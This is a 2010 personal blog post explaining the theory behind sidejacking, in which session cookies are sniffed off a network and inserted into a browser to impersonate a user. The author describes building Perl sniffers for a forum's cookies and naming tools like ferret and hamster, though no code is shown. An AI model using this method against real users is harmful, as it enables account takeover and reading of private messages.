Monday, February 1, 2010

Stealing cookies to impersonate web-users and hijack user accounts (Sidejacking)

This post is more on theory behind such an attack and why they work. I blogged about a tool called ferret and hamster in the past which can be used to demonstrate this attack. When i first saw the awesomeness of such a tool a line was drawn between me having the understanding of what was really going on and being a script kiddie. I knew how the attack works and why it works but it was never something i could've accomplished on my own. That is no longer the case anymore :)

The idea behind the side jacking attack is to impersonate a user via their cookies and session IDs. Cookies and session IDs are two mechanisms that a webserver may use to authenticate or remember its clients. For example, say you log onto gmail and you exit that web browser session without signing off, the next time you open up your browser and navigate to the gmail sign on page, you would notice that you are automatically signed in. This is because there are certain cookies and session ids stored in your browser that is being used to authenticate you to gmails servers.

This attack isnt quite difficult using tools like ferret and hamster that are already out there but sometimes things don't work like they should. I've encountered such problems and decided to digg deeper into this and see how i can do this attack without using such tools and maybe i can understand why they work sometimes and fail the other times. The difficulty in writing such a program is in figuring out what cookies to clone. In my research i also found that only the content field in the cookie might be used to authenticate the user and not so much the expiration date and time fields. Haven't tested on many sites but i tested on one of my favorite music discussion forums,

I wrote a few perl sniffers including one(specifically tailered to sniff the cookies from the domain, that extracts the cookie information in an easy to read format. When the sniffer sees the necessary cookies from this domain, including session and userid cookie information, it pulls them out and dumps them to standard output(screen). I can then quickly manually use a firefox extension to edit and or add cookie information as necessary. After insertion of the required cookies, i can then navigate to the domain (in this example, and with some good luck, you would now be impersonating someones user account. You now would be able to read their emails, edit some of their personal information etc. Its for this reason users should be more concious, not only when using public internet hotspots, but even at work and their homes as well. This type of attack can best be mitigated by remembering to logout from all your web sessions.

No comments:

Post a Comment